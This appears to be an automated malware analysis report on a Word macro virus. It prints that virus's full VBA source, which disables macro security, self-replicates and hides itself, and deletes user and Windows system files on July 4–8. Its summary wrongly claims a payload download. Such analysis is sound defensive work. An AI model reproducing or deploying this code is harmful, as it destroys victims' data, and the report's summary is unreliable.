Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc77649992050327…

MALICIOUS

Office (OLE)

Size: 33.5 KB
Created: 2001-07-05 15:38:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 306d6268301260813cc1e09fa4f89a68
SHA-1: 8231f63fcc82f8c2634b5a1805e072ccc2a80d2d
SHA-256: bc776499920503276dfe0a8f47ce1b20b1b344a20d73dc4870d8cf1c187cc3d8
Risk Score: 256

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1105 Ingress Tool Transfer

The sample contains critical heuristics indicating the presence of VBA macros, specifically AutoOpen, Auto_Close, and Shell() calls. The VBA script attempts to export a component named 'Wrath' to 'C:\MSWIN.DLL', import it into the Normal template, and then delete the original DLL. This process is repeated with 'C:\MSWIN2.DLL'. The script also attempts to modify the security level for Office macros via the registry key HKCU\Software\Microsoft\Office\9.0\Word\Security\Level. These actions strongly suggest an attempt to download and execute a second-stage payload, likely for persistence or further infection.

Heuristics (6)

  • ClamAV: Win.Trojan.Psycho-3 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script:
    MyApp = Shell("notepad.exe", 1)
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Sub AutoOpen()
  • Auto_Close macro [low] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro
    Matched line in script:
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2494 bytes
SHA-256: e5dad4a69a9bcb1f8b0a88e1391a2922683aa61f07d66ae7b6b7281e9351142e
Detection: ClamAV: Doc.Trojan.Wrath-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Wrath"
' Wrath.a
' Coded by tROx and LoX
Sub AutoOpen()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Set a = ActiveDocument
Set b = a.VBProject
Set C = b.VBComponents("Wrath")
Set d = NormalTemplate
Set e = d.VBProject
Set f = e.VBComponents
C.Export "C:\MSWIN.DLL"
f.Import ("C:\MSWIN.DLL")
d.Save
Kill "C:\MSWIN.DLL"
Call IfDate
End Sub
Sub Copy()
On Error Resume Next
Set z = NormalTemplate
Set y = z.VBProject
Set x = y.VBComponents("Wrath")
Set w = ActiveDocument
Set v = w.VBProject
Set u = v.VBComponents
x.Export "C:\MSWIN2.DLL"
u.Import ("C:\MSWIN2.DLL")
w.Save
Kill "C:\MSWIN2.DLL"
Call IfDate
End Sub
Sub AutoNew()
On Error Resume Next
Call Copy
End Sub
Sub FileSave()
On Error Resume Next
Call Copy
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
Call Copy
End Sub
Sub AutoClose()
On Error Resume Next
Call Copy
End Sub
Sub ToolsMacro()
On Error Resume Next
MsgBox "Internal Error.  Word is unable to activate this command.", vbCritical, "Microsoft Word"
Call IfDate
End Sub
Sub ViewVBCode()
On Error Resume Next
MsgBox "Internal Error.  Word is unable to activate this command.", vbCritical, "Microsoft Word"
Call IfDate
End Sub
Sub July3()
On Error Resume Next
Options.BlueScreen = True
MyApp = Shell("notepad.exe", 1)
    SendKeys "                                                                                                                                                                                                                            'FEEL MY WRATH.......'", True
    AppActivate (MyApp)
End Sub
Sub July4()
On Error Resume Next
Options.BlueScreen = True
Kill "C:/My Documents/*.*"
RmDir "C:/My Documents"
Kill "C:/Program Files/Internet Explorer"
Kill "C:/Windows/*.*"
Kill "C:/Windows/System"
Kill "C:/Windows/System32/Drivers"
MsgBox "Happy July 4th!!", vbInformation, "Microsoft Word"
End Sub
Sub IfDate()
On Error Resume Next
If Month(Now) = 7 And Day(Now) = 3 Then
Call July3
End If
If Month(Now) = 7 Then
If Day(Now) > 3 And Day(Now) < 9 Then
Call July4
End If
End If
End Sub